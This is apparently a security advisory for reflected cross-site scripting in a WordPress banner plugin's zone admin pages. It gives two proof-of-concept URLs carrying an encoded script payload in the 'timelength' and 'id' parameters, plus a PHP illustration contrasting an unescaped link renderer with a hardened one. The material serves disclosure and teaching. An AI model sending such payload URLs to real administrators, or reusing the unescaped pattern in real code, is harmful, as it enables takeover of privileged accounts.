Description
The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting, which could be used against high-privilege users such as administrators.

Have an admin open the following URLs:
- https://example.com/wp-admin/admin.php?page=bannerlid-zones&subpage=Overview&id=1&timelength=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
- https://example.com/wp-admin/admin.php?page=bannerlid-zones&subpage=edit_zone&id=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
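
The bug class described above, as an added PHP example that is not the plugin's own code (its source is not shown on this page): a hypothetical link renderer that builds a URL from request parameters, first unescaped and then hardened. The function names are assumptions; the parameter names and the sample value are taken from the URLs above.

```php
<?php
// Added illustration of the bug class; hypothetical code, not the plugin's source.

// Vulnerable pattern: request values are concatenated into a URL that is
// written into an href attribute with no validation or escaping.
function render_link_vulnerable(array $get): string
{
    $url = 'admin.php?page=bannerlid-zones&subpage=Overview'
         . '&id=' . ($get['id'] ?? '')
         . '&timelength=' . ($get['timelength'] ?? '');
    return '<a href="' . $url . '">Overview</a>';
}

// Reject non-scalar input such as timelength[]=x instead of casting an array.
function scalar_param(array $get, string $key): string
{
    return isset($get[$key]) && is_scalar($get[$key]) ? (string) $get[$key] : '';
}

// Hardened pattern: force id to a non-negative integer, URL-encode every
// value, then escape the finished URL for the HTML attribute context.
// In WordPress the corresponding helpers are absint(), add_query_arg()
// and esc_url(); plain PHP functions are used here so the file runs alone.
function render_link_hardened(array $get): string
{
    $query = http_build_query([
        'page'       => 'bannerlid-zones',
        'subpage'    => 'Overview',
        'id'         => abs((int) scalar_param($get, 'id')),
        'timelength' => scalar_param($get, 'timelength'),
    ]);
    return '<a href="' . htmlspecialchars('admin.php?' . $query, ENT_QUOTES, 'UTF-8')
         . '">Overview</a>';
}

// Constructed input: the URL-decoded timelength value from the first URL above.
$get = ['id' => '1', 'timelength' => '"><script>alert(1)</script>'];

echo render_link_vulnerable($get), PHP_EOL; // value closes the attribute early
echo render_link_hardened($get), PHP_EOL;   // value stays inside href, encoded

// Regression check: the hardened output must not contain a raw script tag.
if (strpos(render_link_hardened($get), '<script>') !== false) {
    fwrite(STDERR, "escaping regression\n");
    exit(1);
}
```

The integer cast on `id` also covers the second URL, where the same payload is sent in the `id` parameter.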